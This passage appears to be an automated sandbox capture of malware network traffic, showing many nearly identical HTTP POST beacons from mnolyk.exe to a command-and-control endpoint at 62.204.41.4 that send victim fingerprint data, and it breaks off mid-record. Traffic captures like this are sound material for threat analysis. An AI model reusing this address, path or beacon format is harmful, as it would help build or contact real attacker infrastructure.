                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:41.185913086 CET396INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        196192.168.2.54988662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:41.361243010 CET397OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:41.423928976 CET397INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        197192.168.2.54988762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:41.597625017 CET398OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:41.661936045 CET398INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        198192.168.2.54988862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:41.840854883 CET399OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:41.906905890 CET399INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        199192.168.2.54988962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:42.087363005 CET400OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:42.156582117 CET400INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.54969262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:29.077816010 CET147OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:29.144706964 CET201INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        20192.168.2.54971062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:33.533909082 CET220OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:33.601789951 CET221INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        200192.168.2.54989062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:42.348321915 CET401OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:42.415592909 CET401INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        201192.168.2.54989162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:42.583952904 CET402OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:42.649425030 CET402INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        202192.168.2.54989262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:42.833784103 CET403OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:42.900185108 CET403INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        203192.168.2.54989362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:43.066540003 CET404OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:43.134987116 CET404INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        204192.168.2.54989462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:43.316977024 CET405OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:43.380888939 CET405INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        205192.168.2.54989562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:43.567435026 CET406OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:43.633063078 CET406INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        206192.168.2.54989662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:43.821532965 CET407OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:43.887778044 CET407INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        207192.168.2.54989762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:44.164540052 CET408OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:44.234129906 CET408INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        208192.168.2.54989862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:44.411726952 CET409OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:44.476085901 CET409INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        209192.168.2.54989962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:44.645814896 CET410OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:44.710201979 CET410INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        21192.168.2.54971162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:33.781092882 CET221OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:33.843689919 CET222INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        210192.168.2.54990062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:44.895342112 CET411OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:44.961194038 CET411INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        211192.168.2.54990162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:45.128470898 CET412OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:45.193317890 CET412INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        212192.168.2.54990262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:45.366775990 CET413OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
